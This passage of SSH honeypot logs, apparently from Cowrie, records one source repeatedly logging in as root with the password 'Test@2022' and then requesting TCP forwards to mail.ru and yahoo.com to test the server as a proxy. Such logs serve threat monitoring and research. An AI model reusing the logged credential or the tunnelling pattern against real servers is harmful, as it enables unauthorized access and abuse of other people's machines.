a-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:36.211647Z","src_ip":"77.83.207.83","session":"c56e3bbe74bd"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:36.460850Z","src_ip":"77.83.207.83","session":"c56e3bbe74bd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":23480,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:23480","sensor":"my-vps","timestamp":"2025-08-31T03:47:36.511801Z","session":"c56e3bbe74bd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:36.561951Z","src_ip":"77.83.207.83","session":"c56e3bbe74bd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":29117,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:29117","sensor":"my-vps","timestamp":"2025-08-31T03:47:36.704301Z","session":"c56e3bbe74bd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:36.754650Z","src_ip":"77.83.207.83","session":"c56e3bbe74bd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":12173,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:12173","sensor":"my-vps","timestamp":"2025-08-31T03:47:36.896235Z","session":"c56e3bbe74bd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:36.946203Z","src_ip":"77.83.207.83","session":"c56e3bbe74bd"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:36.996883Z","src_ip":"77.83.207.83","session":"c56e3bbe74bd"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":62399,"dst_ip":"1.2.3.4","dst_port":22,"session":"08139ce7c4f7","protocol":"ssh","message":"New connection: 77.83.207.83:62399 (1.2.3.4:22) [session: 08139ce7c4f7]","sensor":"my-vps","timestamp":"2025-08-31T03:47:37.048568Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:37.058868Z","src_ip":"77.83.207.83","session":"08139ce7c4f7"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:37.101399Z","src_ip":"77.83.207.83","session":"08139ce7c4f7"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:37.364574Z","src_ip":"77.83.207.83","session":"08139ce7c4f7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":2296,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:2296","sensor":"my-vps","timestamp":"2025-08-31T03:47:37.418016Z","session":"08139ce7c4f7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:37.470932Z","src_ip":"77.83.207.83","session":"08139ce7c4f7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":34,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:34","sensor":"my-vps","timestamp":"2025-08-31T03:47:37.619294Z","session":"08139ce7c4f7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:37.672406Z","src_ip":"77.83.207.83","session":"08139ce7c4f7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":14020,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:14020","sensor":"my-vps","timestamp":"2025-08-31T03:47:37.819348Z","session":"08139ce7c4f7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:37.872211Z","src_ip":"77.83.207.83","session":"08139ce7c4f7"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:37.926229Z","src_ip":"77.83.207.83","session":"08139ce7c4f7"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":62489,"dst_ip":"1.2.3.4","dst_port":22,"session":"ffd1c091c4fc","protocol":"ssh","message":"New connection: 77.83.207.83:62489 (1.2.3.4:22) [session: ffd1c091c4fc]","sensor":"my-vps","timestamp":"2025-08-31T03:47:37.975210Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:37.975909Z","src_ip":"77.83.207.83","session":"ffd1c091c4fc"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:38.026171Z","src_ip":"77.83.207.83","session":"ffd1c091c4fc"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:38.275066Z","src_ip":"77.83.207.83","session":"ffd1c091c4fc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":32375,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:32375","sensor":"my-vps","timestamp":"2025-08-31T03:47:38.326362Z","session":"ffd1c091c4fc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:38.376199Z","src_ip":"77.83.207.83","session":"ffd1c091c4fc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":2126,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:2126","sensor":"my-vps","timestamp":"2025-08-31T03:47:38.520315Z","session":"ffd1c091c4fc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:38.570306Z","src_ip":"77.83.207.83","session":"ffd1c091c4fc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":5708,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:5708","sensor":"my-vps","timestamp":"2025-08-31T03:47:38.712137Z","session":"ffd1c091c4fc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:38.762053Z","src_ip":"77.83.207.83","session":"ffd1c091c4fc"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:38.812687Z","src_ip":"77.83.207.83","session":"ffd1c091c4fc"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":62588,"dst_ip":"1.2.3.4","dst_port":22,"session":"cdaf7a1ce5c2","protocol":"ssh","message":"New connection: 77.83.207.83:62588 (1.2.3.4:22) [session: cdaf7a1ce5c2]","sensor":"my-vps","timestamp":"2025-08-31T03:47:38.863146Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:38.864008Z","src_ip":"77.83.207.83","session":"cdaf7a1ce5c2"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:38.915194Z","src_ip":"77.83.207.83","session":"cdaf7a1ce5c2"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:39.170114Z","src_ip":"77.83.207.83","session":"cdaf7a1ce5c2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":25974,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:25974","sensor":"my-vps","timestamp":"2025-08-31T03:47:39.222521Z","session":"cdaf7a1ce5c2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:39.273885Z","src_ip":"77.83.207.83","session":"cdaf7a1ce5c2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":32148,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:32148","sensor":"my-vps","timestamp":"2025-08-31T03:47:39.417578Z","session":"cdaf7a1ce5c2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:39.468806Z","src_ip":"77.83.207.83","session":"cdaf7a1ce5c2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":15326,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:15326","sensor":"my-vps","timestamp":"2025-08-31T03:47:39.613460Z","session":"cdaf7a1ce5c2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:39.664588Z","src_ip":"77.83.207.83","session":"cdaf7a1ce5c2"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:39.716759Z","src_ip":"77.83.207.83","session":"cdaf7a1ce5c2"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":62672,"dst_ip":"1.2.3.4","dst_port":22,"session":"7ec4e9fc03bf","protocol":"ssh","message":"New connection: 77.83.207.83:62672 (1.2.3.4:22) [session: 7ec4e9fc03bf]","sensor":"my-vps","timestamp":"2025-08-31T03:47:39.766018Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:39.766728Z","src_ip":"77.83.207.83","session":"7ec4e9fc03bf"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:39.817049Z","src_ip":"77.83.207.83","session":"7ec4e9fc03bf"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:40.066910Z","src_ip":"77.83.207.83","session":"7ec4e9fc03bf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":22567,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:22567","sensor":"my-vps","timestamp":"2025-08-31T03:47:40.117999Z","session":"7ec4e9fc03bf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:40.168484Z","src_ip":"77.83.207.83","session":"7ec4e9fc03bf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":24641,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:24641","sensor":"my-vps","timestamp":"2025-08-31T03:47:40.312680Z","session":"7ec4e9fc03bf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:40.362872Z","src_ip":"77.83.207.83","session":"7ec4e9fc03bf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":17335,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:17335","sensor":"my-vps","timestamp":"2025-08-31T03:47:40.504600Z","session":"7ec4e9fc03bf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:40.555339Z","src_ip":"77.83.207.83","session":"7ec4e9fc03bf"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:40.606191Z","src_ip":"77.83.207.83","session":"7ec4e9fc03bf"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":62767,"dst_ip":"1.2.3.4","dst_port":22,"session":"a8631b68c888","protocol":"ssh","message":"New connection: 77.83.207.83:62767 (1.2.3.4:22) [session: a8631b68c888]","sensor":"my-vps","timestamp":"2025-08-31T03:47:40.654752Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:40.655764Z","src_ip":"77.83.207.83","session":"a8631b68c888"}
